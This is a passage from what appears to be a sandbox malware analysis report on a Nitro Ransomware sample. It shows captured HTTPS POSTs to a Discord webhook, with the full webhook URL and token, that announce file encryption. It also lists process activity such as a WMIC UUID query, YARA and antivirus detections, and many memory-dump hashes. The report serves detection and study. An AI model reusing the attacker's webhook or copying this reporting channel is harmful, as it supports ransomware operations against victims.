x-envoy-upstream-service-time: 73
x-ratelimit-bucket: 3cd1f278bd0ecaf11e0d2391374c011d
x-ratelimit-limit: 5
x-ratelimit-remaining: 2
x-ratelimit-reset: 1664081190
x-ratelimit-reset-after: 2
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vf1o1ahSVLonVTitEzWswxmWCnNy%2BXxTShEkxKQSQrFozqsrO0H0vzKqvbQdqVynUiotmSp0NnkuKmhKiV6g2VjvqAEqDOePI0wvHVdmho%2FSOwcOg%2BtSgp%2FfQ3fc6CXq%2F2zQRA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Set-Cookie: __sdcfduid=04c598303c8d11eda4074e000d8729a35a7a459a84e876940b4074f04242eaa21313bb3a5015ea958e8cb62672d76c26; Expires=Fri, 24-Sep-2027 04:46:28 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
Set-Cookie: __cfruid=7f74dd4d738e789baab8672651fdb745dc3a22e3-1664081188; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Ser
2022-09-25 04:46:28 UTC | 5 | IN | Data Raw: 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
Data Ascii: ver: cloudflare


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.4 | 49703 | 162.159.136.232 | 443 | C:\Users\user\Desktop\12057ad2.exe
Timestamp | kBytes transferred | Direction | Data
2022-09-25 04:46:28 UTC | 5 | OUT | POST /api/webhooks/1004011365263998976/a2AGTiGqW4Slobe2Bq9uW3XtAqYfaz6vmF6N5qjD0tSb8Mxr_xKkfGVtlH8n2bvzuN04 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: canary.discord.com
Content-Length: 147
Expect: 100-continue
2022-09-25 04:46:28 UTC | 5 | IN | HTTP/1.1 100 Continue
2022-09-25 04:46:28 UTC | 5 | OUT | Data Raw: 63 6f 6e 74 65 6e 74 3d 25 36 30 25 36 30 25 36 30 53 74 61 72 74 69 6e 67 2b 66 69 6c 65 2b 65 6e 63 72 79 70 74 69 6f 6e 2e 2e 25 36 30 25 36 30 25 36 30 26 75 73 65 72 6e 61 6d 65 3d 4e 69 74 72 6f 2b 52 61 6e 73 6f 6d 77 61 72 65 26 61 76 61 74 61 72 5f 75 72 6c 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 69 2e 69 62 62 2e 63 6f 25 32 46 30 66 72 54 44 39 32 25 32 46 64 69 73 63 6f 72 64 2d 61 76 61 74 61 72 2d 35 31 32 2e 70 6e 67
Data Ascii: content=%60%60%60Starting+file+encryption..%60%60%60&username=Nitro+Ransomware&avatar_url=https%3A%2F%2Fi.ibb.co%2F0frTD92%2Fdiscord-avatar-512.png
2022-09-25 04:46:29 UTC | 6 | IN | HTTP/1.1 204 No Content
Date: Sun, 25 Sep 2022 04:46:29 GMT
Content-Type: text/html; charset=utf-8
Connection: close
CF-Ray: 75011dc6ae689975-FRA
Set-Cookie: __dcfduid=05071abc3c8d11edb93d963c3e9b1edd; Expires=Fri, 24-Sep-2027 04:46:29 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Via: 1.1 google
CF-Cache-Status: DYNAMIC
Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Content-Type-Options: nosniff
x-envoy-upstream-service-time: 90
x-ratelimit-bucket: 3cd1f278bd0ecaf11e0d2391374c011d
x-ratelimit-limit: 5
x-ratelimit-remaining: 1
x-ratelimit-reset: 1664081190
x-ratelimit-reset-after: 1
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=W8S8rvF8E9YQ36qW8ju3MQ4HuRk2Wu84XLnAodtIjNRdbpXR5ghoEzggjAoD5AudP8RjYQ6z2sY%2BeJGA084vu2S7O43g8rGS5KVKXF%2FeI6yU7EKkQPX31ZjnGU9SYYfxUiIORg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Set-Cookie: __sdcfduid=05071abc3c8d11edb93d963c3e9b1edd039f2a970f1c6832447f29ef7e04f6c877fa29f5cd55b27db72de4ca68061581; Expires=Fri, 24-Sep-2027 04:46:29 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
Set-Cookie: __cfruid=6eabc3857375536211a04d72640b476f2ceaea83-1664081189; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: c
2022-09-25 04:46:29 UTC | 7 | IN | Data Raw: 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
Data Ascii: loudflare


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
5 | 192.168.2.4 | 49704 | 162.159.137.232 | 443 | C:\Users\user\Desktop\12057ad2.exe
Timestamp | kBytes transferred | Direction | Data
2022-09-25 04:48:27 UTC | 7 | OUT | POST /api/webhooks/1004011365263998976/a2AGTiGqW4Slobe2Bq9uW3XtAqYfaz6vmF6N5qjD0tSb8Mxr_xKkfGVtlH8n2bvzuN04 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: canary.discord.com
Content-Length: 196
Expect: 100-continue
Connection: Keep-Alive
2022-09-25 04:48:27 UTC | 7 | IN | HTTP/1.1 100 Continue
2022-09-25 04:48:27 UTC | 7 | OUT | Data Raw: 63 6f 6e 74 65 6e 74 3d 25 36 30 25 36 30 25 36 30 46 69 6e 69 73 68 65 64 2b 65 6e 63 72 79 70 74 69 6e 67 2b 76 69 63 74 69 6d 25 32 37 73 2b 66 69 6c 65 73 2e 2b 54 6f 74 61 6c 2b 6e 75 6d 62 65 72 2b 6f 66 2b 66 69 6c 65 73 2b 65 6e 63 72 79 70 74 65 64 25 33 41 2b 35 34 25 36 30 25 36 30 25 36 30 26 75 73 65 72 6e 61 6d 65 3d 4e 69 74 72 6f 2b 52 61 6e 73 6f 6d 77 61 72 65 26 61 76 61 74 61 72 5f 75 72 6c 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 69 2e 69 62 62 2e 63 6f 25 32 46 30 66 72 54 44 39 32 25 32 46 64 69 73 63 6f 72 64 2d 61 76 61 74 61 72 2d 35 31 32 2e 70 6e 67
Data Ascii: content=%60%60%60Finished+encrypting+victim%27s+files.+Total+number+of+files+encrypted%3A+54%60%60%60&username=Nitro+Ransomware&avatar_url=https%3A%2F%2Fi.ibb.co%2F0frTD92%2Fdiscord-avatar-512.png
2022-09-25 04:48:27 UTC | 7 | IN | HTTP/1.1 204 No Content
Date: Sun, 25 Sep 2022 04:48:27 GMT
Content-Type: text/html; charset=utf-8
Connection: close
CF-Ray: 750120ab0b7f929f-FRA
Set-Cookie: __dcfduid=4b9ec3da3c8d11edbc2cd2bda68c03bf; Expires=Fri, 24-Sep-2027 04:48:27 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Via: 1.1 google
CF-Cache-Status: DYNAMIC
Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Content-Type-Options: nosniff
x-envoy-upstream-service-time: 68
x-ratelimit-bucket: 3cd1f278bd0ecaf11e0d2391374c011d
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1664081310
x-ratelimit-reset-after: 2
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=1PvONvHL7omCk0xFatFrQE96nWszSPRC3bS4IiThTOyA9DQcRlFKD9MbHxBpBw7j521j1ZSaBKrhbkkYMl7RbF4sT99%2F2UYK9snxidQk3OdzI4W8IICr2vewxih6nJTuXYDfWw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Set-Cookie: __sdcfduid=4b9ec3da3c8d11edbc2cd2bda68c03bff3fa7545e40d0932c78576e772e638ae0d1b61a505180d45f918869f811ca81e; Expires=Fri, 24-Sep-2027 04:48:27 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
Set-Cookie: __cfruid=a6b6167d6c960df5d29602b835627bce362967f9-1664081307; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: clo
2022-09-25 04:48:27 UTC | 9 | IN | Data Raw: 75 64 66 6c 61 72 65 0d 0a 0d 0a
Data Ascii: udflare


                                              Target ID:0
                                              Start time:06:46:22
                                              Start date:25/09/2022
                                              Path:C:\Users\user\Desktop\12057ad2.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\12057ad2.exe"
                                              Imagebase:0xc60000
                                              File size:62976 bytes
                                              MD5 hash:716BF12F1B7B6B04F1ACF6F8AE1EB4BB
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Yara matches:
                                              • Rule: JoeSecurity_NitroRansomware, Description: Yara detected Nitro Ransomware, Source: 00000000.00000003.304957981.000000000149C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_NitroRansomware, Description: Yara detected Nitro Ransomware, Source: 00000000.00000000.303846489.0000000000C62000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                              Reputation:low

                                              Target ID:1
                                              Start time:06:46:23
                                              Start date:25/09/2022
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:cmd.exe
                                              Imagebase:0xd90000
                                              File size:232960 bytes
                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Target ID:2
                                              Start time:06:46:24
                                              Start date:25/09/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7c72c0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Target ID:3
                                              Start time:06:46:25
                                              Start date:25/09/2022
                                              Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                              Wow64 process (32bit):true
                                              Commandline:wmic csproduct get uuid
                                              Imagebase:0xcd0000
                                              File size:391680 bytes
                                              MD5 hash:79A01FCD1C8166C5642F37D1E0FB7BA8
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Target ID:4
                                              Start time:06:46:38
                                              Start date:25/09/2022
                                              Path:C:\Users\user\AppData\Local\Temp\12057ad2.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\AppData\Local\Temp\12057ad2.exe"
                                              Imagebase:0x40000
                                              File size:62976 bytes
                                              MD5 hash:716BF12F1B7B6B04F1ACF6F8AE1EB4BB
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:.Net C# or VB.NET
                                              Yara matches:
                                              • Rule: JoeSecurity_NitroRansomware, Description: Yara detected Nitro Ransomware, Source: 00000004.00000002.572902920.000000000079F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_NitroRansomware, Description: Yara detected Nitro Ransomware, Source: 00000004.00000002.574244055.00000000023C4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: MALWARE_Win_Nitro, Description: Detects Nitro Ransomware, Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe, Author: ditekSHen
                                              • Rule: RAN_Nitro_Aug_2021_1, Description: Detect Nitro ransomware, Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe, Author: Arkbird_SOLG
                                              Antivirus matches:
                                              • Detection: 100%, Avira
                                              • Detection: 100%, Joe Sandbox ML
                                              • Detection: 92%, ReversingLabs
                                              • Detection: 54%, Metadefender
                                              Reputation:low

                                              Target ID:5
                                              Start time:06:46:49
                                              Start date:25/09/2022
                                              Path:C:\Users\user\AppData\Local\Temp\12057ad2.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\AppData\Local\Temp\12057ad2.exe"
                                              Imagebase:0x5b0000
                                              File size:62976 bytes
                                              MD5 hash:716BF12F1B7B6B04F1ACF6F8AE1EB4BB
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:.Net C# or VB.NET
                                              Yara matches:
                                              • Rule: JoeSecurity_NitroRansomware, Description: Yara detected Nitro Ransomware, Source: 00000005.00000002.574148014.00000000028C4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_NitroRansomware, Description: Yara detected Nitro Ransomware, Source: 00000005.00000002.572197724.0000000000AE4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:low

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.572319473.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_12a0000_12057ad2.jbxd
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.572319473.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_12a0000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c9b8155f203e8e27ebdc5525b92b6f222a22b429cac915841e26ed16e25d475b
                                                • Instruction ID: 396564348fa938fa62463793e33f64e4145f438611e269010b08cfa55c66aeec
                                                • Opcode Fuzzy Hash: c9b8155f203e8e27ebdc5525b92b6f222a22b429cac915841e26ed16e25d475b
                                                • Instruction Fuzzy Hash: C221E375E256189BDB08CFAAD9805DDFBB3BFC9310F18D12AD808A7315DB3068468B40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.572319473.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_12a0000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 22e97e51beb004451c95523df53b7c131a9b0944e8eb83b9807ed3e4de70e958
                                                • Instruction ID: dbc27dc815458791bbebe3165914cfa65451cdfe0cf6c15fe21e66a4560a0309
                                                • Opcode Fuzzy Hash: 22e97e51beb004451c95523df53b7c131a9b0944e8eb83b9807ed3e4de70e958
                                                • Instruction Fuzzy Hash: 662125B0D412089FCB48DFA9E9819EEBBB2EF89304F14812AD409B7354DB385906CF55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.572319473.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_12a0000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d356f203d57aac8d913202347f07a624aec70b290f45febd659daaede5b620ff
                                                • Instruction ID: c1fd914ceb0745bf76dba4041e0bd7479f452bd51f6f1d3425425b92e01a4001
                                                • Opcode Fuzzy Hash: d356f203d57aac8d913202347f07a624aec70b290f45febd659daaede5b620ff
                                                • Instruction Fuzzy Hash: F121F4B5E652089FCB18CFAAE9805EDFBF6BF89310F18D16AD808A7215D73069458F40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.572319473.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_12a0000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2b585056a1694b4d1e3099e2eaaf2fd558687bfc6025c52321111d8d65212cb2
                                                • Instruction ID: 4ca06c140bbca23ca8bbf6ec3f5c457edc124fe8f59ba81b01a11ad8619ea171
                                                • Opcode Fuzzy Hash: 2b585056a1694b4d1e3099e2eaaf2fd558687bfc6025c52321111d8d65212cb2
                                                • Instruction Fuzzy Hash: F0210470D0120C9FCB44DFA9E4909EEBBB2AF88304F10912AD408B7354DB385906CF55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.572319473.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_12a0000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 11f068154d9774a435926a026e62d9c9c88ed1fd6c902a895f4ce1febdaeaa34
                                                • Instruction ID: 11ea8ee4c5f77a857629b8cafb559e65cfaca961eac27011d004cb6f9cf2c6fc
                                                • Opcode Fuzzy Hash: 11f068154d9774a435926a026e62d9c9c88ed1fd6c902a895f4ce1febdaeaa34
                                                • Instruction Fuzzy Hash: 5721337494424B9FC744FFA8E9D4BDE7771FB80308F454929C2019B264EB706A498BD1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.572319473.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_12a0000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e962707e16cfa351fa3c7b7a71ec149f77b0243f5e2c315d87814899d083d251
                                                • Instruction ID: fecf4a0d05b7564a4c15a584f9be32cd0077da422584d1cd716f0b888945540e
                                                • Opcode Fuzzy Hash: e962707e16cfa351fa3c7b7a71ec149f77b0243f5e2c315d87814899d083d251
                                                • Instruction Fuzzy Hash: F0212174A4420B9FCB54FFA9E4D4ADE7771FB40308F414929D20197268EB707D498BD1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.572319473.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_12a0000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bcd54ec678efa01ad7fe4158be4f1076405a1a8a7d1985f860e7b93460ed2776
                                                • Instruction ID: 5489f411f23f876fa8475225b3f0d999b0688df8739a102e47af8ac02770ca34
                                                • Opcode Fuzzy Hash: bcd54ec678efa01ad7fe4158be4f1076405a1a8a7d1985f860e7b93460ed2776
                                                • Instruction Fuzzy Hash: 99114970D152868FCB14EFB4E89C2BEFBB0FB4A302F005959810AA3284EB744940CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.572319473.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_12a0000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f0566e2794e67410fe9454c3b551843be5f4e6b16feed29e11859214c605b71d
                                                • Instruction ID: 4ed01843201b00c29b99fe85965a7c0ab808c2b0dea32189641fffac5ed78270
                                                • Opcode Fuzzy Hash: f0566e2794e67410fe9454c3b551843be5f4e6b16feed29e11859214c605b71d
                                                • Instruction Fuzzy Hash: 1221D374A51208CFDBA4DF64E898E99BBB1FF0A305F109199D409A7364DB30AD84CF00
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.572319473.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_12a0000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 398afd2268f97e3338710a23dad9db3bc6e37d876a0fc29fddee0b4148baa9b5
                                                • Instruction ID: 8fc391a43cb7a84694dae3a430a0ed7d1069026a1bfbb9653374cbc7170674b7
                                                • Opcode Fuzzy Hash: 398afd2268f97e3338710a23dad9db3bc6e37d876a0fc29fddee0b4148baa9b5
                                                • Instruction Fuzzy Hash: A0017C70D09288DFCB15EFA4E9547ADBFB0FB0A300F1885EAC854A7366D3744A45CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.572319473.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_12a0000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6135f948a90f536ecc589d7f87b1caef99534cd5d678f2e8403c8c73c5399c8c
                                                • Instruction ID: 21bb6f545cb4c74a484dda5897284e6a5317671f6dd5fb1b91d80a04dc094fe0
                                                • Opcode Fuzzy Hash: 6135f948a90f536ecc589d7f87b1caef99534cd5d678f2e8403c8c73c5399c8c
                                                • Instruction Fuzzy Hash: B611C87095428A9FC705FF68E4E09DDBBB1FF40208F544AA9C4449B229F7316E4ACB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.572319473.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_12a0000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a7eee312d43cb670e93701105df5eaa32a55afbd280678e2d4d4ed323edef9dd
                                                • Instruction ID: 7a456a68975c5f1bc087d5041cf8d023fea48aafcfe92357348cc5c1dbb5cac3
                                                • Opcode Fuzzy Hash: a7eee312d43cb670e93701105df5eaa32a55afbd280678e2d4d4ed323edef9dd
                                                • Instruction Fuzzy Hash: 3C11FA74904209DFCB40EFA8D5809DEFBB1FB45304F148AAAD454A7225D730AE45DF81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.572319473.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_12a0000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 763ac0b778f59b645aa7ba1f57f19e9ba219a88a0b7074a0552747eea205803b
                                                • Instruction ID: 65f497ea5303dda2858a6fafde1c62cca70c14b9d1604dabe8d8e068934e3597
                                                • Opcode Fuzzy Hash: 763ac0b778f59b645aa7ba1f57f19e9ba219a88a0b7074a0552747eea205803b
                                                • Instruction Fuzzy Hash: 1E019A34685204DFC304CB68D688CA9BBB0FF4A315B2581D9E549AB372CB35AD40DA00
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.572319473.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_12a0000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3e0dbccc368b592d941314f51cd2d432a2ae160cab97ea5402e2d534ad1ae21a
                                                • Instruction ID: db0a9766d026d8b385beeb5ab097c184e126480820f3dace4b3929e453b58871
                                                • Opcode Fuzzy Hash: 3e0dbccc368b592d941314f51cd2d432a2ae160cab97ea5402e2d534ad1ae21a
                                                • Instruction Fuzzy Hash: 99018BB0C94348EFEB10EFA4D4583EDBBB4EB06315F0480AAC50197281D3BC4A89CF51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.572319473.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_12a0000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c3bea80e887cdef1733be301b84a8f8c1a3eb0c0395f14159c3ed11c7446cdad
                                                • Instruction ID: 283504c1ad1f93c12f713939563401143bcf6133daa9b7f1e0f40b5af813fa1a
                                                • Opcode Fuzzy Hash: c3bea80e887cdef1733be301b84a8f8c1a3eb0c0395f14159c3ed11c7446cdad
                                                • Instruction Fuzzy Hash: 56019274A0420AEFCB40EFA9D580A9EFBB1FB44308F548AA9D514A7314E770AE459B81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.572319473.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_12a0000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 30c8e0fb035840ef517324b1e096b5569986582e1cefe7fa7f9e0a152adc6203
                                                • Instruction ID: 103a9c9f45e907df0baf5079af3503aa7aa5bdefdb8e37c00e2be959cd1d7e52
                                                • Opcode Fuzzy Hash: 30c8e0fb035840ef517324b1e096b5569986582e1cefe7fa7f9e0a152adc6203
                                                • Instruction Fuzzy Hash: FA015E7095024AAFC754FF68E4D4ADDB7B1FB80308F544A69C50497228FB307E498B91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.572319473.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_12a0000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1fbbe70febb175e42974c4793f99e375d6f444235e82f0c91ab62b16f851d180
                                                • Instruction ID: 31533997d0634a13250906464843a9625fb4c4623ddc698feb06fd28cd45f59d
                                                • Opcode Fuzzy Hash: 1fbbe70febb175e42974c4793f99e375d6f444235e82f0c91ab62b16f851d180
                                                • Instruction Fuzzy Hash: A2F06D70D14208EFEB10EFA5D5593EDBBB4EB44305F5484B9C501A3384E3B98688DF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.572319473.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_12a0000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d448cf9adb180095e247f725584d00fd458de97982251cf3a4d7f8c907e88c17
                                                • Instruction ID: eced765b95152032fa8c2adde7f5f21b71c8ee621ea44a6475ad0b5314d7574f
                                                • Opcode Fuzzy Hash: d448cf9adb180095e247f725584d00fd458de97982251cf3a4d7f8c907e88c17
                                                • Instruction Fuzzy Hash: 54F0BD34641204DFC304DF68D688D19B7F4FF0A315B2181D8E909AB331CB31EE40DA04
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.572319473.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_12a0000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4d4f7cc648b71b7ea4a3df601791171dc7bd80148b53352dee1b4bc001988927
                                                • Instruction ID: 505b893eede7b91ac9d8ec21105c58fab26bb54f94d8f5c9b6dd735f47e48eb4
                                                • Opcode Fuzzy Hash: 4d4f7cc648b71b7ea4a3df601791171dc7bd80148b53352dee1b4bc001988927
                                                • Instruction Fuzzy Hash: 1FF03770C01248EFCB14EFA8E9487AEFBF0EB09304F1486AAC914A3345D7709A41DF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.572319473.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_12a0000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d019d3b54c4e608e075c76c7a02b0a61bfc53f4a22ddb7e6b19d61ee654ae77b
                                                • Instruction ID: 35dd4e8e05a36eee62aef6be2e9cacd8788767eb815866ceddbbbf2a6eabd19a
                                                • Opcode Fuzzy Hash: d019d3b54c4e608e075c76c7a02b0a61bfc53f4a22ddb7e6b19d61ee654ae77b
                                                • Instruction Fuzzy Hash: C2F02070981348DFC344EFB4E90869D7BF0FB01314B0006AEC401E7222D7341E05CB01
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
